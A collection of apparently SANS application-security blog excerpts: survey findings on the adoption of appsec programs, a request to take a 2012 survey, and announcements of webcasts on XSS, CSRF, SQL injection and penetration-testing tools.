For the second year in a row Jim Bird and I have helped SANS put together a "Survey on Application Security Programs and Practices". We asked some of the same questions as the previous year, just in a different way. Some interesting trends this year, as taken from the executive summary of the soon to be published paper, include the following:
- There was a significant improvement in the number of organizations implementing application security programs and practices. The percentage of organizations that have an active Appsec program increased from 66% last year to 83% this yearand many of the organizations that do not have a program in place yet are at least following some kind of ad hoc security practices.
- Organizations are testing more frequently. In this year's survey, more than one-third are doing continuous, ongoing security testing of their applications, whereas only 23% indicated doing so in our ...
SANS has just opened a survey to understand more about the challenges and risks that companies are facing in application security, and what tools and practices people have found are most effective in managing appsec problems.
Please follow this link and take 5-10 minutes to answer the survey questions:
Help shape the future of application security practices and technologies and also enter to win a $300 American Express gift card, which will be awarded to one lucky winner!
Sponsored by NT OBJECTives, Qualys, Whitehat Security and Veracode, this survey will remain online until November 7, 2012. Results will be published at http://www.sans.org/info/113477 on December 13, 2012, during a related
Here are some recent appsec webcasts for your viewing pleasure:
- Web Application Threats: Combining XSS and CSRF to own the world!
Kevin Johnson covers Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). Specifically, "how they can be used to exploit users and applications, how to find them and what their combined power can accomplish."
- Innovation in Application Security: Application Risk Management
John Sapp discusses "business critical application security trends and the need for comprehensive approaches to secure software development" including coverage of what "application attacks are most prevalent now, the importance of the secure development lifecycle (SDL), and cost-effective methods to implement a program-level commitment to
We have three cool webcasts lined up next week:
1) SQL Injection for the Penetration Tester on April 27
Eric Conrad will kick off the week of webcasts with something every penetration tester should know about. "Both normal and blind SQL attacks will be described, including reading and altering databases, creating local files, and gaining command shell access to the database server."
2) Defending Web Applications: Going back to to First Principles on April 28
In this talk Johannes and Jason "will outline current attacks against web applications, why they evade detection by network defenses and how to build defensible applications by going back to simple defensive principles. Each of the attacks will be illustrated from a defensive as well as offensive point of view showing the
Felipe Moreno will be giving a webcast on Groundspeed, a Firefox add-on that allows penetration testers to manipulate the interface of web applications in order to adapt it to penetration test needs, removing the annoying client-side limitations and making the test more efficient.
"Not much has changed since the beginning of the web application penetration testing in terms of process for performing manual input validation tests. Place a client proxy between the browser and the application, generate requests, intercept them and modify the HTTP parameters. It's true that we have seen some nice improvements at the client proxy level (compare the old Achilles to the last version of the Burp suite), but the general approach still remains the same. This webcast will propose a new way to look at input data and a new approach to manually test